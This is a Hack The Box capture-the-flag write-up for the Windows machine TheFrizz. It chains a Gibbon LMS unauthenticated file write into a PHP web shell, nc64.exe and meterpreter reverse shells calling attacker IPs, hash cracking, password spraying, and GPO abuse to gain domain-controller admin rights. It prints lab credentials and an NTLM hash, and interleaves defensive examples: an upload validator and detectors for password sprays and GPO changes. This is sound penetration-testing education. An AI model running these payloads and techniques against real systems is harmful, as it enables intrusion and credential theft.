Hack The Box / WINDOWS / 2026-03-18
# Hack The Box — TheFrizz (Windows)

Gibbon v25.0.00 unauthenticated RCE gives web access, database hash cracking leads to domain credentials, Kerberos SSH access exposes recoverable artifacts, and GPO abuse grants local admin rights for full compromise.

## Target

- IP: 10.129.197.98
## Recon

```bash
sudo nmap -sC -sV 10.129.197.98 -p- -T5 -v
```

```text
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-17 01:28:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
61628/tcp open  msrpc         Microsoft Windows RPC
65180/tcp open  msrpc         Microsoft Windows RPC
65189/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-17T01:28:50
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 1d06h05m16s
```

The `clock-skew` of 1d06h05m16s matters later: Kerberos rejects requests whose timestamp differs from the KDC's clock by more than five minutes, so time has to be synced with the DC before any ticket can be requested.
Browse to http://10.129.197.98. It redirects to http://frizzdc.frizz.htb/home/, so add frizzdc.frizz.htb to /etc/hosts.

The site contains courses. Clicking staff login redirects to http://frizzdc.frizz.htb/Gibbon-LMS/, which is Gibbon (https://gibbonedu.org/).

At http://frizzdc.frizz.htb/Gibbon-LMS/ we see:

> **NOTICE** Due to unplanned Pentesting by students, WES is migrating applications and tools to stronger security protocols. During this transition, Ms. Fiona Frizzle will be migrating Gibbon to utilize our Azure Active Directory SSO. Please note this might take 48 hours where your accounts will not be available. Please bear with us, and thank you for your patience. Anything that can not utilize Azure AD will use the strongest available protocols such as Kerberos.

Also:

> Powered by Gibbon v25.0.00

Useful references:

- https://vulmon.com/searchpage?q=Gibbonedu%20Gibbon
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-45878
- https://herolab.usd.de/security-advisories/usd-2023-0025/
## Initial Access (Gibbon RCE)

The Rubrics endpoint `rubrics_visualise_saveAjax.php` takes a base64-encoded body in `img` and a caller-supplied `path` and writes the decoded bytes to that path under the web root without authentication; this is the file write referenced above. Run:

```bash
curl -X POST 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' \
  -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001'
```

The base64 part of the payload (`%2b` is a URL-encoded `+`) decodes to:

```php
<?php echo system($_GET['cmd'])?>
```
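As an added example (not code from the writeup or from Gibbon), the following Python models the checks the vulnerable endpoint is missing: it parses the `img` field in the `<mime>;<meta>,<base64>` shape the request uses, decodes it the way the server would, and rejects the request unless the path is a bare file name with an image extension and the decoded bytes carry the magic bytes of the declared image type. `PAGE_PAYLOAD` is the `img` value from the curl request above; `ALLOWED_TYPES`, `ALLOWED_EXTENSIONS` and the function names are my own.

```python
import base64
import binascii
import posixpath
import re

# Declared MIME type -> magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# "<mime>;<meta>,<base64>": the shape the Rubrics endpoint receives in `img`.
DATA_URI = re.compile(
    r"^(?P<mime>[\w.+-]+/[\w.+-]+);(?P<meta>[^,]*),(?P<data>[A-Za-z0-9+/=\s]*)$"
)

# The `img` value from the request above, URL-decoded (%2b -> +).
PAGE_PAYLOAD = "image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8+"


def decode_payload(img_field: str) -> bytes:
    """Return the raw bytes the endpoint would write to disk for this `img` value."""
    m = DATA_URI.match(img_field)
    if not m:
        raise ValueError("img is not in <mime>;<meta>,<base64> form")
    return base64.b64decode(m.group("data"), validate=True)


def inspect_upload(img_field: str, path_field: str) -> list:
    """Server-side checks the vulnerable endpoint lacks. Empty list means accept."""
    problems = []

    # 1. Destination must be a bare file name (no directory components,
    #    no backslashes) with an image extension, never .php.
    if path_field != posixpath.basename(path_field) or "\\" in path_field:
        problems.append("path must be a bare file name")
    ext = posixpath.splitext(path_field)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        problems.append(f"extension {ext or '(none)'} not allowed")

    # 2. Declared type must be an image type we handle.
    m = DATA_URI.match(img_field)
    if not m:
        return problems + ["img is not in <mime>;<meta>,<base64> form"]
    mime = m.group("mime")
    if mime not in ALLOWED_TYPES:
        return problems + [f"MIME type {mime} not allowed"]

    # 3. Bytes must be valid base64 and must actually look like that image type:
    #    a PHP file never starts with the PNG signature.
    try:
        raw = base64.b64decode(m.group("data"), validate=True)
    except (binascii.Error, ValueError):
        return problems + ["img payload is not valid base64"]
    if not raw.startswith(ALLOWED_TYPES[mime]):
        problems.append(f"content does not start with {mime} magic bytes")
    if b"<?" in raw:
        problems.append("content contains a PHP open tag")
    return problems


def encode_data_uri(mime: str, raw: bytes) -> str:
    """Build a well-formed `img` value (used to construct benign test inputs)."""
    return f"{mime};base64,{base64.b64encode(raw).decode()}"


if __name__ == "__main__":
    print(decode_payload(PAGE_PAYLOAD))
    print(inspect_upload(PAGE_PAYLOAD, "asdf.php"))
    png = encode_data_uri("image/png", ALLOWED_TYPES["image/png"] + bytes(16))
    print(inspect_upload(png, "rubric.png"))
```

Checking the declared type against the bytes, not just the extension, is what matters: the request above passes a perfectly plausible `image/png` label, and only the content and the `.php` destination give it away.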
Browse:

```text
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami
```

Output:

```text
frizz\w.webservice frizz\w.webservice
```

Every result appears twice because `system()` already prints the command output and `echo` then prints its return value, which is the last line of that output. Check the working directory:

```text
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=cd
```

Output:

```text
C:\xampp\htdocs\Gibbon-LMS C:\xampp\htdocs\Gibbon-LMS
```

We can get a reverse shell. Download nc64.exe:

```bash
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
```

Host the file locally:

```bash
python3 -m http.server 8000
```

Use the web shell to download it on the target:

```text
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=curl%20http://10.10.16.30:8000/nc64.exe%20-o%20%22C:%5Cxampp%5Chtdocs%5Cnc64.exe%22
```

The encoded part corresponds to:

```bash
curl http://10.10.16.30:8000/nc64.exe -o "C:\xampp\htdocs\nc64.exe"
```

Listen:

```bash
rlwrap nc -vlnp 4444
```

Trigger the reverse shell:

```text
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=C:%5Cxampp%5Chtdocs%5Cnc64.exe%20-e%20cmd.exe%2010.10.16.30%204444
```

Payload decoded:

```text
C:\xampp\htdocs\nc64.exe -e cmd.exe 10.10.16.30 4444
```

We get a reverse shell.
## Database Credentials and Hash Cracking

Read the config:

```cmd
type config.php
```

We find:

```php
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
```

MySQL is not exposed externally (3306 is absent from the nmap results), so forward it with chisel (https://github.com/jpillora/chisel). Download the Linux and Windows builds and upload the Windows one to the target.

Attacker:

```bash
./chisel_linux server --reverse --port 5555
```

Target:

```cmd
.\chisel_windows.exe client http://10.10.16.30:5555 R:3306
```

Now connect to MySQL and enter the password `MisterGibbs!Parrot!?1`:

```bash
mysql -h 127.0.0.1 -u MrGibbonsDB --skip_ssl -p
```

```sql
show databases;
```

```text
+--------------------+
| Database           |
+--------------------+
| gibbon             |
| information_schema |
| test               |
+--------------------+
```

```sql
use gibbon;
show tables;
select * from gibbonperson;
```

We get:

- Email: f.frizzle@frizz.htb
- Username: f.frizzle
- Password (hashed): 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
- Salt: /aACFhikmNopqrRTVz2489
Create the hash file in `hash:salt` form:

```text
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
```

Crack with hashcat mode 1420, sha256($salt.$pass), which is how Gibbon stores the password:

```bash
./hashcat-6.2.6/hashcat.bin -a 0 -m 1420 ./hash ./rockyou.txt
```

Result:

```text
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
```
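Added example, not from the writeup: a Python model of the hash format the hashcat mode above targets. `gibbon_hash` is sha256(salt . password) as mode 1420 defines it, `wordlist_check` is the dictionary loop hashcat runs at scale, and `slow_hash`/`verify_slow` show the scrypt-based alternative that would make the same rockyou run impractical. `PAGE_RECORD` is the `hash:salt` line from the hash file above; all other names are mine.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# The hash:salt record from this box, as written to the hashcat input file.
PAGE_RECORD = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489"


def parse_hashcat_line(line: str) -> Tuple[str, str]:
    """Split a `hash:salt` record; the digest must be a 64-hex-char SHA-256."""
    digest, salt = line.strip().split(":", 1)
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest.lower()):
        raise ValueError("digest is not a 64-hex-char SHA-256 value")
    return digest.lower(), salt


def gibbon_hash(salt: str, password: str) -> str:
    """sha256(salt . password): hashcat mode 1420, the scheme stored in gibbonperson."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


def verify_gibbon(stored: str, salt: str, password: str) -> bool:
    return hmac.compare_digest(gibbon_hash(salt, password), stored.lower())


def wordlist_check(stored: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces `stored`, or None.
    One SHA-256 per guess is all a salted-but-fast hash costs, which is why a
    rockyou run against it finishes in seconds; the salt only defeats precomputation."""
    for pw in candidates:
        if verify_gibbon(stored, salt, pw):
            return pw
    return None


# Defensive comparison: a memory-hard KDF (scrypt, n=2^14) with a random 16-byte salt.
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def slow_hash(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${dk.hex()}"


def verify_slow(stored: str, password: str) -> bool:
    scheme, salt_hex, dk_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    dk = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    digest, salt = parse_hashcat_line(PAGE_RECORD)
    # Re-check the value hashcat reported against the stored record.
    print("hashcat result reproduces the stored hash:",
          verify_gibbon(digest, salt, "Jenni_Luvs_Magic23"))
```

The same loop against `slow_hash` would cost roughly 16 MiB of memory and a few tens of milliseconds per guess, which is the difference between a wordlist run that finishes before the coffee and one that does not finish.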
Validate with LDAP:

```bash
ldapsearch -x -H ldap://10.129.184.216 -D 'f.frizzle@frizz.htb' -w 'Jenni_Luvs_Magic23' -b 'CN=Users,DC=frizz,DC=htb'
```

It works.
## AD Enumeration and Kerberos Access

Sync time with the DC first; the scan showed a clock skew of over a day and Kerberos refuses anything outside its five-minute window:

```bash
sudo ntpdate frizzdc.frizz.htb
```
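Added example (not from the writeup) that makes the reasoning behind the time sync concrete: it parses nmap's `clock-skew` string from the scan above into seconds and compares it with the five-minute Kerberos tolerance, and derives the same figure from the `server time` field nmap prints for port 88 given a local timestamp. Function and constant names are mine.

```python
import re
from datetime import datetime

# Default tolerance for the gap between a client's timestamp and the KDC's clock;
# MIT krb5 and Windows both use 5 minutes, and a request outside it is answered
# with KRB_AP_ERR_SKEW instead of a ticket.
KERBEROS_MAX_SKEW = 300

# nmap prints skews like '1d06h05m16s', '4m59s' or '-3s' (negative = server behind us).
SKEW_RE = re.compile(
    r"^(?P<sign>-?)(?:(?P<d>\d+)d)?(?:(?P<h>\d+)h)?(?:(?P<m>\d+)m)?(?:(?P<s>\d+)s)?$"
)
TIME_FMT = "%Y-%m-%d %H:%M:%SZ"   # the 'server time: 2025-03-17 01:28:01Z' shape


def parse_nmap_skew(value: str) -> int:
    """Turn nmap's clock-skew string into signed seconds."""
    m = SKEW_RE.match(value.strip())
    if not m or not any(m.group(k) for k in "dhms"):
        raise ValueError(f"unrecognised skew string: {value!r}")
    secs = (int(m.group("d") or 0) * 86400 + int(m.group("h") or 0) * 3600
            + int(m.group("m") or 0) * 60 + int(m.group("s") or 0))
    return -secs if m.group("sign") else secs


def skew_from_server_time(server_time: str, local_time: str) -> int:
    """Skew in seconds from the port-88 'server time' field and our own UTC clock."""
    st = datetime.strptime(server_time, TIME_FMT)
    lt = datetime.strptime(local_time, TIME_FMT)
    return round((st - lt).total_seconds())


def kerberos_will_fail(skew_seconds: int) -> bool:
    """True when the KDC would reject our AS-REQ for clock skew."""
    return abs(skew_seconds) > KERBEROS_MAX_SKEW


if __name__ == "__main__":
    skew = parse_nmap_skew("1d06h05m16s")   # value from the nmap output above
    print(skew, "seconds ahead; Kerberos would fail:", kerberos_will_fail(skew))
```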
Collect BloodHound data with Kerberos:

```bash
bloodhound-python --auth-method kerberos -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -ns 10.129.184.216 -d 'frizz.htb' -dc 'frizzdc.frizz.htb' -c All --zip
```

Start and load BloodHound:

```bash
sudo neo4j console
bloodhound --no-sandbox
```

Load the zip and check Analysis -> Shortest Paths to High Value Targets. f.frizzle has CanPSRemote to frizzdc.frizz.htb.

Try WinRM:

```bash
evil-winrm -i frizzdc.frizz.htb -u 'f.frizzle@frizz.htb' -p 'Jenni_Luvs_Magic23'
```

It does not work. Request a TGT:

```bash
getTGT.py 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip 10.129.184.216
[*] Saving ticket in f.frizzle.ccache
export KRB5CCNAME=f.frizzle.ccache
```

Edit /etc/krb5.conf so the realm resolves to the DC (the realm block belongs under the `[realms]` section):

```ini
[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
    }
```

Try again:

```bash
evil-winrm -i frizzdc.frizz.htb -u f.frizzle -r frizz.htb
```

Still fails.

Log in to Gibbon with `f.frizzle@frizz.htb:Jenni_Luvs_Magic23`. In messages we find:

> !!!Reminder From IT!!!
> Reminder that TODAY is the migration date for our server access methods. Most workflows using PowerShell will not notice a difference (Enter-PSSession). If you do have a problem, please reach out to Fiona or Marvin between 8am and 4pm to install the pre-requisite SSH client on your Mac or Windows laptop.

Request a TGT if needed:

```bash
getTGT.py 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip 10.129.184.216
[*] Saving ticket in f.frizzle.ccache
export KRB5CCNAME=f.frizzle.ccache
```

Connect with SSH; it authenticates with the Kerberos ticket in KRB5CCNAME over GSSAPI, so no password is asked for:

```bash
ssh f.frizzle@frizz.htb
```

We get a PowerShell session. Check privileges:

```powershell
whoami /all
```

```text
User Name       SID
=============== ==============================================
frizz\f.frizzle S-1-5-21-2386970044-1145388522-2932701813-1103

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
## Loot in Recycle Bin and Lateral Movement

Inspect the recycle bin:

```powershell
cd 'C:\$RECYCLE.BIN'
ls -hidden
```

```text
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
```

```powershell
cd S-1-5-21-2386970044-1145388522-2932701813-1103
ls
```

```text
-a--- 10/29/2024 7:31 AM      148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
```

The small `$I` file holds the deleted item's original path and deletion time; the `$R` file is the deleted content itself, which is the one worth retrieving. To transfer files conveniently, use meterpreter. Generate the payload:

```bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.252 LPORT=4444 -f exe -o reverse.exe
```

Upload reverse.exe to the target. Start the handler:

```text
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
exploit
```

Run reverse.exe on the target, then in meterpreter:

```text
cd 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103'
download '$IE2XMEG.7z'
download '$RE2XMEG.7z'
```

Extract on the attacker:

```bash
7z x '$RE2XMEG.7z'
```

We get the folder wapt. Read the config:

```bash
cd wapt/conf
cat waptserver.ini
```

Contains:

```ini
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
```

Decode:

```bash
echo -n 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
```

```text
!suBcig@MehTed!R
```

The decoded value ends in a newline that is not part of the password.
Generate usernames via RID brute force:

```bash
nxc smb frizzdc.frizz.htb -d frizz.htb -k --use-kcache --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
```

Password spray with kerbrute (https://github.com/ropnop/kerbrute):

```bash
./kerbrute --dc frizzdc.frizz.htb -d frizz.htb -v passwordspray users_2.txt '!suBcig@MehTed!R'
```

Output:

```text
2025/03/19 06:12:35 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@MehTed!R
```
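Detection-side counterpart, added here and not part of the writeup: the spray above produces a burst of Kerberos pre-authentication failures (Security event 4771, status 0x18 = wrong password) for many different accounts from one source address, followed by a successful TGT request (event 4768) for the account that hit. The Python below runs that logic over a constructed set of simplified event records; the account names other than those on this page, the IPs, the times and the `SAMPLE_EVENTS` layout are made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records, reduced to the 4771/4768 EventData fields the
# detection needs. Windows logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d).
SRC = "::ffff:10.10.14.252"      # the sprayer (constructed)
WKS = "::ffff:10.129.10.7"       # an ordinary workstation (constructed)
SAMPLE_EVENTS = [
    {"time": "2025-03-19 06:12:31", "id": 4771, "TargetUserName": "f.frizzle",    "IpAddress": SRC, "Status": "0x18"},
    {"time": "2025-03-19 06:12:31", "id": 4771, "TargetUserName": "w.webservice", "IpAddress": SRC, "Status": "0x18"},
    {"time": "2025-03-19 06:12:32", "id": 4771, "TargetUserName": "Administrator","IpAddress": SRC, "Status": "0x18"},
    {"time": "2025-03-19 06:12:32", "id": 4771, "TargetUserName": "student01",    "IpAddress": SRC, "Status": "0x18"},
    {"time": "2025-03-19 06:12:33", "id": 4771, "TargetUserName": "student02",    "IpAddress": SRC, "Status": "0x18"},
    {"time": "2025-03-19 06:12:34", "id": 4771, "TargetUserName": "teacher01",    "IpAddress": SRC, "Status": "0x18"},
    # The one account the sprayed password fits: a successful TGT request.
    {"time": "2025-03-19 06:12:35", "id": 4768, "TargetUserName": "M.SchoolBus",  "IpAddress": SRC, "Status": "0x0"},
    # Benign noise: a user mistyping their own password twice from a workstation.
    {"time": "2025-03-19 06:20:00", "id": 4771, "TargetUserName": "f.frizzle",    "IpAddress": WKS, "Status": "0x18"},
    {"time": "2025-03-19 06:20:09", "id": 4771, "TargetUserName": "f.frizzle",    "IpAddress": WKS, "Status": "0x18"},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def detect_spray(events, window_seconds=60, min_accounts=5):
    """One alert per source IP whose bad-password failures (4771/0x18) cover at
    least `min_accounts` distinct accounts within `window_seconds`. A 4768 from
    the same IP at or after the spray start raises severity to high."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_ip[e["IpAddress"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs
                    if e["id"] == 4771 and e.get("Status", "").lower() == "0x18"]
        for i, start in enumerate(failures):
            window_end = _ts(start) + timedelta(seconds=window_seconds)
            # Distinct accounts failing from this IP inside the sliding window.
            accounts = {e["TargetUserName"].lower()
                        for e in failures[i:] if _ts(e) <= window_end}
            if len(accounts) < min_accounts:
                continue
            successes = [e["TargetUserName"] for e in evs
                         if e["id"] == 4768 and _ts(e) >= _ts(start)]
            alerts.append({
                "ip": ip,
                "first_seen": start["time"],
                "accounts_tried": len(accounts),
                "successful_logons": successes,
                "severity": "high" if successes else "medium",
            })
            break   # one alert per source is enough; later windows are the same spray
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(a)
```

Keying on distinct accounts per source rather than failures per account is what separates a spray from a lockout-threshold brute force: each account here fails only once, which no per-account lockout policy will ever notice.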
Request a TGT:

```bash
getTGT.py 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -dc-ip 10.129.239.254
[*] Saving ticket in M.SchoolBus.ccache
export KRB5CCNAME=M.SchoolBus.ccache
```

SSH as M.SchoolBus:

```bash
ssh M.SchoolBus@frizz.htb
```

We get a PowerShell shell. From BloodHound: M.SchoolBus is in Desktop Admins, Desktop Admins is in Group Policy Creator Owners, and Group Policy Creator Owners is in Denied RODC Password Replication Group.
## Privilege Escalation via GPO Abuse

Upload tools:

- SharpGPOAbuse.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpGPOAbuse.exe)
- SharpView.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpView.exe)

Enumerate GPOs:

```powershell
.\SharpView.exe Get-DomainGPO
```

Alternative with PowerView (https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1):

```powershell
. .\PowerView.ps1
Get-DomainGPO | select displayname
```

```text
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
```

Membership of Group Policy Creator Owners allows creating new GPOs, so create one:

```powershell
New-GPO 'test'
Get-DomainGPO | select displayname
```

Now `test` is visible. Check the OUs:

```powershell
Get-ADOrganizationalUnit -Filter *
```

```text
City                     :
Country                  :
DistinguishedName        : OU=Domain Controllers,DC=frizz,DC=htb
LinkedGroupPolicyObjects : {CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=frizz,DC=htb}
ManagedBy                :
Name                     : Domain Controllers
ObjectClass              : organizationalUnit
ObjectGUID               : b6aa26d6-58bd-45cb-9dc4-982c468a61d7
PostalCode               :
State                    :
StreetAddress            :

City                     :
Country                  :
DistinguishedName        : OU=Class_Frizz,DC=frizz,DC=htb
LinkedGroupPolicyObjects : {}
ManagedBy                :
Name                     : Class_Frizz
ObjectClass              : organizationalUnit
ObjectGUID               : 7b6c87c2-4966-4024-abee-3c45dad1871a
PostalCode               :
State                    :
StreetAddress            :
```
Link the GPO to the Domain Controllers OU (a GPO does nothing until it is linked to a container whose `gPLink` attribute we can write):

```powershell
New-GPLink -Name "test" -Target "OU=Domain Controllers,DC=frizz,DC=htb" -LinkEnabled Yes -Enforced Yes
```

Abuse the GPO to add M.SchoolBus to the local Administrators group on the DC, then force a policy refresh and check the account:

```powershell
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount 'M.SchoolBus' --GPOName 'test'
gpupdate /Force
net user M.SchoolBus
```

We observe:

```text
Local Group Memberships      *Administrators       *Remote Management Use
```
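Detection-side counterpart to the GPO steps above, added here and not the writeup's own code: creating a GPO writes a groupPolicyContainer object (Security event 5137), linking it rewrites `gPLink` on the target OU (event 5136), and editing it changes attributes on the container (5136 again). Both events need the Directory Service Changes audit subcategory enabled and a SACL on the objects, otherwise nothing is logged. The Python below flags that sequence over constructed, simplified event records: the GPO GUID is a placeholder, `GPO_ADMINS` is an assumed allow-list, and the actor and attribute values model what this page does.

```python
import re

# Placeholder GUID for the new GPO (not the real one); the DC OU DN is from the page.
NEW_GPO = "{11111111-2222-3333-4444-555555555555}"
GPO_DN = f"CN={NEW_GPO},CN=Policies,CN=System,DC=frizz,DC=htb"
DC_OU = "OU=Domain Controllers,DC=frizz,DC=htb"
DOMAIN_ROOT = "DC=frizz,DC=htb"

# Constructed records with the EventData field names of 5137/5136.
# OperationType %%14674 = value added, %%14675 = value deleted.
SAMPLE_EVENTS = [
    # 5137: the GPO object is created.
    {"id": 5137, "SubjectUserName": "M.SchoolBus", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": GPO_DN},
    # 5136: its displayName is set to 'test'.
    {"id": 5136, "SubjectUserName": "M.SchoolBus", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": GPO_DN, "AttributeLDAPDisplayName": "displayName",
     "AttributeValue": "test", "OperationType": "%%14674"},
    # 5136: gPLink on the Domain Controllers OU gains the link; ';2' = enforced.
    {"id": 5136, "SubjectUserName": "M.SchoolBus", "ObjectClass": "organizationalUnit",
     "ObjectDN": DC_OU, "AttributeLDAPDisplayName": "gPLink",
     "AttributeValue": f"[LDAP://{GPO_DN};2]", "OperationType": "%%14674"},
    # 5136: the GPO's version counter is bumped when its settings change, so
    # clients notice the edit. Any GPO editing tool does this.
    {"id": 5136, "SubjectUserName": "M.SchoolBus", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": GPO_DN, "AttributeLDAPDisplayName": "versionNumber",
     "AttributeValue": "1", "OperationType": "%%14674"},
    # Benign noise: an admin editing a user's description.
    {"id": 5136, "SubjectUserName": "Administrator", "ObjectClass": "user",
     "ObjectDN": "CN=f.frizzle,CN=Users,DC=frizz,DC=htb",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "Teacher",
     "OperationType": "%%14674"},
]

# Assumed allow-list of accounts expected to manage Group Policy.
GPO_ADMINS = {"administrator"}
# Containers whose linked GPOs apply to domain controllers or the whole domain.
TIER0_CONTAINERS = {DC_OU.lower(), DOMAIN_ROOT.lower()}

GPLINK_RE = re.compile(r"\[LDAP://(?P<dn>[^;\]]+);(?P<opts>\d+)\]", re.I)


def parse_gplink(value):
    """Split a gPLink value into (gpo_dn, enforced) pairs; option bit 2 = enforced."""
    return [(m.group("dn"), int(m.group("opts")) & 2 != 0) for m in GPLINK_RE.finditer(value)]


def detect_gpo_abuse(events):
    findings = []
    for e in events:
        actor = e["SubjectUserName"]
        trusted = actor.lower() in GPO_ADMINS
        if e["id"] == 5137 and e["ObjectClass"] == "groupPolicyContainer":
            findings.append({"severity": "low" if trusted else "medium", "actor": actor,
                             "what": f"GPO created: {e['ObjectDN']}"})
        elif e["id"] == 5136 and e.get("AttributeLDAPDisplayName") == "gPLink":
            tier0 = e["ObjectDN"].lower() in TIER0_CONTAINERS
            verb = "linked to" if e.get("OperationType") == "%%14674" else "unlinked from"
            for gpo_dn, enforced in parse_gplink(e["AttributeValue"]):
                findings.append({
                    "severity": "high" if (tier0 and not trusted) else "medium",
                    "actor": actor,
                    "what": f"GPO {verb} {e['ObjectDN']}: {gpo_dn}" + (" (enforced)" if enforced else ""),
                })
        elif e["id"] == 5136 and e["ObjectClass"] == "groupPolicyContainer":
            findings.append({"severity": "low" if trusted else "medium", "actor": actor,
                             "what": f"GPO modified ({e['AttributeLDAPDisplayName']}): {e['ObjectDN']}"})
    return findings


if __name__ == "__main__":
    for f in detect_gpo_abuse(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["actor"], f["what"])
```

The high-severity rule is the one that matters on this box: a non-admin writing `gPLink` on the Domain Controllers OU is exactly the step that turns a harmless new GPO into local admin on the DC, and it is a single, distinctive event.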
SSH login as M.SchoolBus now fails, so get a reverse shell instead. Listen:

```bash
nc -vlnp 4444
```

Upload RunasCs (https://github.com/antonioCoco/RunasCs) and run:

```powershell
.\RunasCs.exe 'M.SchoolBus' '!suBcig@MehTed!R' "C:\tmp\nc64.exe -e cmd.exe 10.10.14.252 4444"
```

We get a reverse shell. Verify:

```cmd
whoami /all
```

We are administrators and can read the root flag:

```text
C:\Administrator\Desktop\root.txt
```

If we want Administrator hashes:

```bash
secretsdump.py -k 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R'@'frizzdc.frizz.htb'
```

```text
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c299f8b2acc2da429d3a35953b3854d7:::
[*] _SC_Apache2.4
w.webservice@frizz.htb:BananaB0at!!@
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
